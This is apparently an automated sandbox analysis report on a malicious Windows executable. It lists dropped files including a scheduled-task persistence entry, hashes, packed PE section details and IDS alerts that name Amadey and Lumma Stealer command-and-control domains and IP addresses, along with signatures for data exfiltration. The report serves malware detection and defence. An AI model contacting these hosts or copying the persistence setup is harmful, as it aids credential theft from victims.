SHA-512:	82BF4D2509A3763E63A5F066E59E401500253AD145F37B4F33D3BAD20797FC77E09E97923085EF365D634E5396495269CF7AEB27DA14B062CCB1283E0318877A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 61%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................2...........@...........................2.....023...@.................................W...k............................t2.............................Pt2..................................................... . ............................@....rsrc...............................@....idata ............................@...njmetvfw..+.......+.................@...xwzznrso......2......b2.............@....taggant.0....2.."...h2.............@...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	unknown
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Reputation:	unknown
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\Tasks\skotes.job

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	284
Entropy (8bit):	3.3875259128879476
Encrypted:	false
SSDEEP:	6:JUqXflNeRKUEZ+lX1CGdKUe6tPjgsW2YRZuy0ldwut0:JUof2RKQ1CGAFAjzvYRQVnt0
MD5:	07A1F414B2F8C31472AD925582C03436
SHA1:	41A108EC94B0295A914AFAB815D520615B949115
SHA-256:	9031948EFD5C2149DBD9D36B8D00BD7FF42B32E0C5A58CF53D027B843422D224
SHA-512:	BA70A548C447ED1A8D5732F329E181C806B058A709FCE3C0A28A7A8C2C809AF94901C4FF064822F3F722BDB7E0C7D810319D2376B927F46684A02C527A017784
Malicious:	false
Reputation:	unknown
Preview:	.....6.b.RXD..l`....F.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................

\Device\Null

Download File

Process:	C:\Windows\System32\schtasks.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	27
Entropy (8bit):	3.7541634277688805
Encrypted:	false
SSDEEP:	3:R/wCu3cov:R/wHZv
MD5:	F8AED8C00E9E1A62294ECA2A412564A3
SHA1:	290081C4084D420572397AB514A9AD638BB7287F
SHA-256:	8ECDC0C25D6979A673BCD2342A543E0C63056F8CD053D5C8A2B8F5F74355E1D7
SHA-512:	A2C1CE924FD68DE7883F31B1C29F698A5A9ED26C5CB42F6340E19CF3FCD78EDC969D977FD9DEA064E32B6E448E51B4CE2AF187623ACA809821298C23B19B13EA
Malicious:	false
Reputation:	unknown
Preview:	ERROR: Access is denied....

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.666880127434823
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	3'312'128 bytes
MD5:	7638e458b00be1a00936ab9419267621
SHA1:	af82d1c612dc47fb72a4798cbc42057bcc941602
SHA256:	12df5f413434f02531f88b0727b96ae8d4ed3c278fc81583dbfd4c0145b43e74
SHA512:	82bf4d2509a3763e63a5f066e59e401500253ad145f37b4f33d3bad20797fc77e09e97923085ef365d634e5396495269cf7aeb27da14b062ccb1283e0318877a
SSDEEP:	49152:BTMxAHE1CwGlAyzR/Bl2fkYdE7u4oUkJrYWH4w7rsF:BBk1hGlAyzR/BwfkYdE64w4
TLSH:	9BE52B61E41D71CFD48E1AF4B517CE86799E72B9472248C39868B8FA7DB3DC021B9C24
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x729000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FCC24C1A44Ah
punpckhbw mm6, qword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [ecx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+00h], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [edx], ecx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [edx], ecx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop ds
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+00h], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x5d4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x3274a0	0x10	njmetvfw
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x327450	0x18	njmetvfw
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x68000	d159abe6055840ae02f23f3a77020e6e	False	0.5607112004206731	data	7.131215498652649	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x5d4	0x400	c10dcc04dfa4d57145bd0ba77bf4ae7a	False	0.708984375	data	5.8025883675377035	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
njmetvfw	0x6b000	0x2bd000	0x2bcc00	a7b9e163aa1ec1ce69ffc23e7b966755	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
xwzznrso	0x328000	0x1000	0x600	f092106ed6e638bf8d2b484a22a5d31f	False	0.5657552083333334	data	4.993159824257107	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x329000	0x3000	0x2200	8265da95a3a396a00abc0ed993a553e9	False	0.0842141544117647	DOS executable (COM)	0.9516775553741272	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x3274b0	0x3e4	XML 1.0 document, ASCII text			0.48092369477911645
RT_MANIFEST	0x327894	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-07T10:07:10.626302+0100	2058639	ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI)	1	192.168.2.4	50075	172.67.132.7	443	TCP
2025-01-07T10:07:10.626302+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50075	172.67.132.7	443	TCP
2025-01-07T10:07:10.626302+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50064	185.163.204.98	80	TCP
2025-01-07T10:08:05.769785+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.4	49793	185.215.113.43	80	TCP
2025-01-07T10:08:08.806068+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49816	185.215.113.16	80	TCP
2025-01-07T10:08:11.226172+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.4	49809	TCP
2025-01-07T10:08:11.929661+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49840	185.215.113.43	80	TCP
2025-01-07T10:08:12.638883+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49843	185.215.113.16	80	TCP
2025-01-07T10:08:15.512088+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49860	185.215.113.43	80	TCP
2025-01-07T10:08:58.874726+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	50016	185.215.113.43	80	TCP
2025-01-07T10:08:59.745472+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	50017	31.41.244.11	80	TCP
2025-01-07T10:09:12.187331+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	50018	185.215.113.43	80	TCP
2025-01-07T10:09:13.226931+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	50019	31.41.244.11	80	TCP
2025-01-07T10:09:16.394525+0100	2058656	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop)	1	192.168.2.4	54148	1.1.1.1	53	UDP
2025-01-07T10:09:16.522327+0100	2058616	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (nearycrepso .shop)	1	192.168.2.4	53496	1.1.1.1	53	UDP
2025-01-07T10:09:16.604459+0100	2058598	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (abruptyopsn .shop)	1	192.168.2.4	50567	1.1.1.1	53	UDP
2025-01-07T10:09:16.638894+0100	2058632	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wholersorie .shop)	1	192.168.2.4	59298	1.1.1.1	53	UDP
2025-01-07T10:09:16.685756+0100	2058610	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (framekgirus .shop)	1	192.168.2.4	63128	1.1.1.1	53	UDP
2025-01-07T10:09:16.735053+0100	2058628	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tirepublicerj .shop)	1	192.168.2.4	54319	1.1.1.1	53	UDP
2025-01-07T10:09:16.765493+0100	2058618	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (noisycuttej .shop)	1	192.168.2.4	59280	1.1.1.1	53	UDP
2025-01-07T10:09:16.824648+0100	2058622	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rabidcowse .shop)	1	192.168.2.4	49482	1.1.1.1	53	UDP
2025-01-07T10:09:16.871263+0100	2058606	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cloudewahsj .shop)	1	192.168.2.4	50810	1.1.1.1	53	UDP
2025-01-07T10:09:17.078573+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	50020	185.215.113.43	80	TCP
2025-01-07T10:09:17.595497+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50021	104.102.49.254	443	TCP
2025-01-07T10:09:17.774371+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	50022	31.41.244.11	80	TCP
2025-01-07T10:09:18.129846+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.4	50021	104.102.49.254	443	TCP
2025-01-07T10:09:18.847423+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50023	104.21.96.1	443	TCP
2025-01-07T10:09:19.287789+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	50023	104.21.96.1	443	TCP
2025-01-07T10:09:19.287789+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50023	104.21.96.1	443	TCP
2025-01-07T10:09:19.749392+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50025	104.21.96.1	443	TCP
2025-01-07T10:09:20.229732+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	50025	104.21.96.1	443	TCP
2025-01-07T10:09:20.229732+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50025	104.21.96.1	443	TCP
2025-01-07T10:09:20.864053+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50028	104.21.96.1	443	TCP
2025-01-07T10:09:21.303355+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	50029	185.215.113.43	80	TCP
2025-01-07T10:09:22.005591+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	50031	31.41.244.11	80	TCP
2025-01-07T10:09:22.069532+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50032	104.21.96.1	443	TCP
2025-01-07T10:09:23.091590+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50033	104.21.96.1	443	TCP
2025-01-07T10:09:23.212802+0100	2058550	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (undesirabkel .click)	1	192.168.2.4	49948	1.1.1.1	53	UDP
2025-01-07T10:09:23.774590+0100	2058551	ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)	1	192.168.2.4	50034	188.114.97.3	443	TCP
2025-01-07T10:09:23.774590+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50034	188.114.97.3	443	TCP
2025-01-07T10:09:24.234498+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	50034	188.114.97.3	443	TCP
2025-01-07T10:09:24.234498+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50034	188.114.97.3	443	TCP
2025-01-07T10:09:24.279055+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50035	104.21.96.1	443	TCP
2025-01-07T10:09:24.711810+0100	2058551	ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)	1	192.168.2.4	50036	188.114.97.3	443	TCP
2025-01-07T10:09:24.711810+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50036	188.114.97.3	443	TCP
2025-01-07T10:09:24.748313+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	50035	104.21.96.1	443	TCP
2025-01-07T10:09:25.205900+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	50036	188.114.97.3	443	TCP
2025-01-07T10:09:25.205900+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50036	188.114.97.3	443	TCP
2025-01-07T10:09:25.586074+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50038	104.21.96.1	443	TCP
2025-01-07T10:09:25.695358+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	50037	185.215.113.43	80	TCP
2025-01-07T10:09:25.877426+0100	2058551	ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)	1	192.168.2.4	50039	188.114.97.3	443	TCP
2025-01-07T10:09:25.877426+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50039	188.114.97.3	443	TCP
2025-01-07T10:09:26.463211+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	50040	31.41.244.11	80	TCP
2025-01-07T10:09:27.334404+0100	2058551	ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)	1	192.168.2.4	50041	188.114.97.3	443	TCP
2025-01-07T10:09:27.334404+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50041	188.114.97.3	443	TCP
2025-01-07T10:09:27.562331+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50043	104.21.96.1	443	TCP
2025-01-07T10:09:28.037910+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50043	104.21.96.1	443	TCP
2025-01-07T10:09:28.451460+0100	2058551	ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)	1	192.168.2.4	50044	188.114.97.3	443	TCP
2025-01-07T10:09:28.451460+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50044	188.114.97.3	443	TCP
2025-01-07T10:09:29.721761+0100	2058551	ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)	1	192.168.2.4	50045	188.114.97.3	443	TCP
2025-01-07T10:09:29.721761+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50045	188.114.97.3	443	TCP
2025-01-07T10:09:30.524968+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	50045	188.114.97.3	443	TCP
2025-01-07T10:09:30.843047+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	50048	185.215.113.43	80	TCP
2025-01-07T10:09:31.620224+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	50050	31.41.244.11	80	TCP
2025-01-07T10:09:32.863770+0100	2058551	ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)	1	192.168.2.4	50051	188.114.97.3	443	TCP
2025-01-07T10:09:32.863770+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50051	188.114.97.3	443	TCP
2025-01-07T10:09:35.075422+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	50055	185.215.113.43	80	TCP
2025-01-07T10:09:35.296948+0100	2048736	ET MALWARE LUMAR Stealer Exfiltration M2	1	192.168.2.4	50057	185.244.212.106	2227	TCP
2025-01-07T10:09:35.783561+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	50056	31.41.244.11	80	TCP
2025-01-07T10:09:36.163692+0100	2058551	ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)	1	192.168.2.4	50058	188.114.97.3	443	TCP
2025-01-07T10:09:36.163692+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50058	188.114.97.3	443	TCP
2025-01-07T10:09:36.632315+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50058	188.114.97.3	443	TCP
2025-01-07T10:09:39.696019+0100	2035595	ET MALWARE Generic AsyncRAT Style SSL Cert	1	191.101.130.246	56001	192.168.2.4	50060	TCP
2025-01-07T10:09:39.758178+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	50059	185.215.113.43	80	TCP
2025-01-07T10:09:40.468346+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	50061	31.41.244.11	80	TCP
2025-01-07T10:09:40.833631+0100	2800029	ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass	1	31.41.244.11	80	192.168.2.4	50061	TCP
2025-01-07T10:09:42.095169+0100	2058638	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cureprouderio .click)	1	192.168.2.4	53046	1.1.1.1	53	UDP
2025-01-07T10:09:42.106576+0100	2856097	ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)	1	192.168.2.4	50030	185.163.204.98	80	TCP
2025-01-07T10:09:42.596916+0100	2058639	ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI)	1	192.168.2.4	50062	172.67.132.7	443	TCP
2025-01-07T10:09:42.596916+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50062	172.67.132.7	443	TCP
2025-01-07T10:09:43.049396+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	50062	172.67.132.7	443	TCP
2025-01-07T10:09:43.049396+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50062	172.67.132.7	443	TCP
2025-01-07T10:09:43.682989+0100	2058639	ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI)	1	192.168.2.4	50063	172.67.132.7	443	TCP
2025-01-07T10:09:43.682989+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50063	172.67.132.7	443	TCP
2025-01-07T10:09:44.198850+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	50063	172.67.132.7	443	TCP
2025-01-07T10:09:44.198850+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50063	172.67.132.7	443	TCP
2025-01-07T10:09:44.384007+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	50065	185.215.113.43	80	TCP
2025-01-07T10:09:44.818054+0100	2058639	ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI)	1	192.168.2.4	50066	172.67.132.7	443	TCP
2025-01-07T10:09:44.818054+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50066	172.67.132.7	443	TCP
2025-01-07T10:09:45.105259+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	50067	31.41.244.11	80	TCP
2025-01-07T10:09:45.477294+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	50066	172.67.132.7	443	TCP
2025-01-07T10:09:45.965848+0100	2058639	ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI)	1	192.168.2.4	50068	172.67.132.7	443	TCP
2025-01-07T10:09:45.965848+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50068	172.67.132.7	443	TCP
2025-01-07T10:09:47.090111+0100	2058639	ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI)	1	192.168.2.4	50069	172.67.132.7	443	TCP
2025-01-07T10:09:47.090111+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50069	172.67.132.7	443	TCP
2025-01-07T10:09:48.544522+0100	2058639	ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI)	1	192.168.2.4	50070	172.67.132.7	443	TCP
2025-01-07T10:09:48.544522+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50070	172.67.132.7	443	TCP
2025-01-07T10:09:49.117216+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	50072	185.215.113.43	80	TCP
2025-01-07T10:09:49.789331+0100	2058639	ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI)	1	192.168.2.4	50073	172.67.132.7	443	TCP
2025-01-07T10:09:49.789331+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50073	172.67.132.7	443	TCP
2025-01-07T10:09:52.685640+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50075	172.67.132.7	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2025 10:08:05.046892881 CET	49793	80	192.168.2.4	185.215.113.43
Jan 7, 2025 10:08:05.051706076 CET	80	49793	185.215.113.43	192.168.2.4
Jan 7, 2025 10:08:05.052638054 CET	49793	80	192.168.2.4	185.215.113.43
Jan 7, 2025 10:08:05.052862883 CET	49793	80	192.168.2.4	185.215.113.43
Jan 7, 2025 10:08:05.057638884 CET	80	49793	185.215.113.43	192.168.2.4
Jan 7, 2025 10:08:05.769717932 CET	80	49793	185.215.113.43	192.168.2.4
Jan 7, 2025 10:08:05.769784927 CET	49793	80	192.168.2.4	185.215.113.43
Jan 7, 2025 10:08:07.283703089 CET	49793	80	192.168.2.4	185.215.113.43
Jan 7, 2025 10:08:07.284025908 CET	49809	80	192.168.2.4	185.215.113.43
Jan 7, 2025 10:08:07.288877010 CET	80	49793	185.215.113.43	192.168.2.4
